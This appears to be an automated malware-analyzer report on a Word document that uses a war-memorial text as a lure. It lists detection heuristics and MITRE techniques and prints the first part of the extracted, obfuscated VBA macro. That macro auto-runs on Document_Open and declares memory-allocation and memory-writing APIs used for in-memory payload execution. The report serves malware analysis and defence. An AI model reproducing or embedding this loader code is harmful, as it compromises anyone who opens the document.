MALICIOUS
122
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The presence of a critical ClamAV heuristic and a high-severity heuristic for a Document_Open macro indicates malicious intent. The VBA macro code, though partially obfuscated, contains API calls for memory allocation and writing, suggesting it's designed to download and execute a second-stage payload. The document itself is a benign text about a war memorial, likely used as a lure.
Heuristics 4
-
ClamAV: Doc.Downloader.Macro-6539595-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11743 bytes |
SHA-256: b30862c9da01e9380dc25500b8fa71df0015226be89c42a33f8782a5ef25460f |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
analyticity
gobemouche = 3 + 51
Pmt 0, gobemouche, 35619, 23122, 6
End Sub
Attribute VB_Name = "indistinction"
Attribute VB_Base = "0{AEECEAFD-FAE6-408C-8BA7-EE0FE94702EC}{9497E2A0-91E3-46D8-9D43-3ADB868F69D1}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "bonasa"
#If (43 - 102 + 459 + 36 - 86 + 350) > ((25 - 31 + 326) - (15 - 52 + 577) * 1) And ((70 - 121 + 79) - (17 - 1 + 12)) * 2 < (Win64) Then
Public Declare PtrSafe Function overlay _
Lib "ntdll " Alias _
"ZwWriteVirtualMemory" (ByVal anshar As Any, ByVal fanatic As Any, ByVal downy As Any, ByVal chukker As Any, ByVal midiron As Any) As LongPtr
Public Declare PtrSafe Function bisect _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (amoret As Any, ByVal medusa As Any, ByVal suffocation As Any, ByVal piously As Any, ByVal ceratosaur As Any, ByVal apolitical As Any, ByVal attractiveness As Any) As Long
Public Declare PtrSafe Function picking _
Lib "ntdll " Alias _
"NtAllocateVirtualMemory" (akaryocyte As LongPtr, apiculated As LongPtr, ByVal consenting As LongPtr, cynopterusByVal As LongPtr, dirk As LongPtr, ByVal dauber As LongPtr) As LongPtr
#End If
#If (107 - 86 + 379 + 53 - 125 + 372) > ((98 - 71 + 293) - (8 - 14 + 546) * 1) And Not ((60 - 63 + 31) - (107 - 37 - 42)) * 2 < (Win64) Then
Public Declare Function picking _
Lib "Ntdll " Alias _
"NtAllocateVirtualMemory" (mordacity As Long, townsendia As Long, ByVal marxistleninist As Long, checkByVal As Long, miller As Long, ByVal juniorgrade As Long) As Long
Public Declare Function bisect _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (expositor As Any, ByVal glaswegian As Any, ByVal benedick As Any, ByVal abulia As Any, ByVal budget As Any, ByVal diametrically As Any, ByVal acromatic As Any) As Long
Public Declare Function overlay _
Lib "Ntdll " Alias _
"ZwWriteVirtualMemory" (ByVal salutation As Any, ByVal unpurified As Any, ByVal choking As Any, ByVal drone As Any, ByVal glass As Any) As Long
#End If
Function macrocolous()
Dim polioptila(255) As Byte
lightingup = 46 - 37 + 56
For i = lightingup To (110 - 56 + 37)
polioptila(lightingup) = lightingup - (60 - 86 + 91)
lightingup = lightingup + 1
If (45 - 8 + 54) < lightingup Then
gnostic = malignant + 50 - 57 + 72
Exit For
End If
centesimal = distraint + 54 - 24 + 35
Next
lightingup = (97 - 103 + 54)
For i = lightingup To (125 - 90 + 23)
polioptila(lightingup) = lightingup + (101 - 121 + 24)
lightingup = lightingup + 1
If (53 - 127 + 132) < lightingup Then
epuration = birr + 25 - 70 + 110
Exit For
End If
mechanic = musical + 22 - 8 + 51
Next
lightingup = (112 - 48 + 33)
For i = lightingup To (54 - 128 + 197)
polioptila(lightingup) = lightingup - (39 - 58 + 90)
lightingup = lightingup + 1
indelible = nefariousness + 117 - 91 + 39
If (114 - 65 + 74) < lightingup Then
teary = crotaphytus + 76 - 39 + 28
Exit For
End If
tributary = annexational + 123 - 115 + 57
Next
polioptila(96 - 109 + 60) = (125 - 9 - 53)
lightingup = (74 - 63 + 32)
polioptila(lightingup) = (18 - 75 + 119)
macrocolous = polioptila
End Function
Function capsicum(truth, perfoliate, plum)
Select Case plum
Case 20 + (10 / 2 - 5)
capsicum = truth \ perfoliate
Case 30 + (5 - 3) / 2 - 1
capsicum = truth And perfoliate
Case 38 + (56 / 7 - 4 * 2)
capsicum = truth * perfoliate
End Select
End Function
Function beagling(oxidizable) As String
Dim speak As Long
Dim insect As Long
Dim bedlam(63) As Long
biogenetic = Fix(220)
Dim meiosis As Integer
Dim monogynous(6962) As Byte
Dim hypentelium(63) As Long
Dim
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.